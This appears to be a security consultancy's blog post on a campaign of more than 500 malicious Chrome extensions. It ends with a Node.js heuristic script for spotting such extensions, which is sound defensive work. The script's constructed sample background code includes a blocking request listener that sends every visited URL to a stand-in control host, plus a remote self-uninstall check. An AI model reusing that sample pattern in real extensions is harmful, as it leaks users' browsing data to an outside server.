Cyber security researchers recently reported that more than 500 browser extensions, downloaded millions of times from Google's Chrome Web Store, surreptitiously uploaded private browsing data to attacker-controlled servers.
Jamila Kaya, an independent researcher, found that these extensions were part of a long-running malware campaign. Working with researchers from Duo Security (owned by Cisco, a US technology company best known for networking products and services), Kaya initially identified 71 Chrome Web Store extensions with about 1.7 million installs and reported the findings to Google. A further 430 extensions were later identified, and Google removed all of the reported extensions.
Kaya and Duo Security information security engineer Jacob Rickerd wrote in their report: "In the case reported here, the Chrome extension creators had specifically made extensions that obfuscated the underlying advertising functionality from users. This was done in order to connect the browser clients to a command and control architecture, exfiltrate private browsing data without the users' knowledge, expose the user to the risk of exploit through advertising streams, and attempt to evade the Chrome Web Store's fraud detection mechanisms."
These extensions primarily presented themselves as tools offering various promotion and advertising-as-a-service utilities. To carry out ad fraud and malvertising, the operators routed infected browsers through a maze of sketchy domains. Each plugin first contacted a domain that shared the plugin's own name to check for instructions on whether to uninstall itself. The plugins then sent browsers to one of a handful of hard-coded control servers to receive further instructions, the advertisements to show, where to place them, and domains for future redirects. Most of the redirects led to benign ads for products from Dell, Macy's and Best Buy.
The operators fed a large volume of ad content into the scheme. A fraction of the ad streams, once clicked, redirected infected browsers to phishing and malware sites. For example:
1. ARCADEYUMGAMES.exe, which reads terminal-service-related registry keys and accesses sensitive data from the local browser.
2. MapsTrek.exe, which is capable of opening and reading the clipboard.
Researchers noted that the campaign had been operating since at least January 2019 and grew steadily, particularly from April 2019 onward. Although the 500 plugins appeared to be distinct products, they contained nearly identical source code, differing mainly in their unusual function names.
Google thanked the researchers for reporting their findings.
Most of the affected installations were on Chrome, though some Firefox users were also affected. In a separate, earlier case of extension data harvesting reported in 2019, Nacho Analytics, the business that gathered and marketed the collected browsing data, shut down after Ars Technica reported on the practice.
The discovery of such malicious and fraudulent browser extensions is a warning: be cautious when installing any browser tool and keep only those that provide real benefit. Before installing, read user reviews for reports of suspicious behaviour. If a suspicious extension is already installed, we, as a cyber security consultancy, recommend identifying it and removing it immediately.
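One way to recognise the pattern described above (an extension with broad host access that contacts hard-coded control domains, asks a server whether to uninstall itself, and redirects requests) is to triage each installed extension's manifest and background script with a few heuristics. The following Node.js script is an added example and is not code from the Duo Security report or from this article; the manifests, background scripts, domain names, the allowlist and the "three findings" threshold are all constructed for the demonstration.

```javascript
// Added example (not from the Duo Security report or this article):
// heuristic triage of a Chrome extension for the pattern described above:
// broad host access, hard-coded control domains, a "should I uninstall
// myself?" check, and blocking request redirection.
// All manifests, scripts and domain names below are constructed for the demo.

const BROAD_HOST_PATTERNS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
// Permissions that let an extension observe or rewrite traffic, or act on itself/other extensions.
const RISKY_PERMISSIONS = new Set(["webRequest", "webRequestBlocking", "proxy", "cookies", "management"]);
// Hosts an extension may legitimately contact; assumed allowlist for the demo.
const ALLOWLIST = new Set(["clients2.google.com", "update.googleapis.com"]);

// Pull every http(s) host literal out of a script's source text.
function extractHosts(source) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(source)) !== null) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

// Words of the extension name long enough to be meaningful inside a hostname.
function nameTokens(name) {
  return name.toLowerCase().split(/[^a-z0-9]+/).filter((w) => w.length >= 4);
}

// Score one extension from its manifest object and the concatenated source of
// its background scripts. Returns the findings so the caller can decide what
// to do; the threshold is a demo choice, not a calibrated detection rule.
function triageExtension(manifest, backgroundSource) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];

  if (perms.some((p) => BROAD_HOST_PATTERNS.has(p))) findings.push("broad host access");

  const risky = perms.filter((p) => RISKY_PERMISSIONS.has(p));
  if (risky.length > 0) findings.push("risky permissions: " + risky.join(", "));

  const hosts = extractHosts(backgroundSource).filter((h) => !ALLOWLIST.has(h));
  if (hosts.length > 0) findings.push("hard-coded external hosts: " + hosts.join(", "));

  // The article notes each plugin first called a domain named after the plugin itself.
  const tokens = nameTokens(manifest.name || "");
  if (hosts.some((h) => tokens.some((t) => h.includes(t)))) findings.push("control domain reuses extension name");

  // Remote kill switch: the extension asks a server whether to remove itself.
  if (/chrome\.management\.uninstallSelf/.test(backgroundSource)) findings.push("self-uninstall logic");

  // A blocking webRequest listener that returns redirectUrl rewrites the user's traffic.
  if (/onBeforeRequest/.test(backgroundSource) && /redirectUrl/.test(backgroundSource)) {
    findings.push("request redirection");
  }

  return { name: manifest.name, score: findings.length, findings, verdict: findings.length >= 3 ? "review" : "ok" };
}

// Constructed sample mimicking the described behaviour (names and domains are fictional).
const SAMPLE_MANIFEST = {
  name: "MapsTrek Promo",
  manifest_version: 2,
  permissions: ["<all_urls>", "webRequest", "webRequestBlocking", "tabs", "management"],
  background: { scripts: ["bg.js"] },
};
const SAMPLE_BG = `
  var CHECK = "https://mapstrek.example/check";
  var C2 = ["https://ctrl-one.example/cfg", "https://ctrl-two.example/cfg"];
  fetch(CHECK).then(function (r) { return r.json(); }).then(function (j) {
    if (j.uninstall) chrome.management.uninstallSelf();
  });
  chrome.webRequest.onBeforeRequest.addListener(
    function (d) { return { redirectUrl: C2[0] + "?u=" + encodeURIComponent(d.url) }; },
    { urls: ["<all_urls>"] }, ["blocking"]);
`;

// Constructed benign sample for contrast.
const BENIGN_MANIFEST = { name: "Tab Counter", manifest_version: 2, permissions: ["tabs"] };
const BENIGN_BG = `chrome.tabs.query({}, function (t) { console.log(t.length); });`;

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_BG), null, 2));
console.log(JSON.stringify(triageExtension(BENIGN_MANIFEST, BENIGN_BG), null, 2));
```

To run this against a real profile, read each extension's manifest.json and the scripts listed under its background key from the Chrome extensions directory and pass them to triageExtension. Each heuristic on its own is weak (many legitimate extensions request webRequest or contact a domain that carries their own name), which is why the script reports the individual findings rather than a single verdict; an extension that trips several of them at once is worth a manual look and, if unexplained, removal.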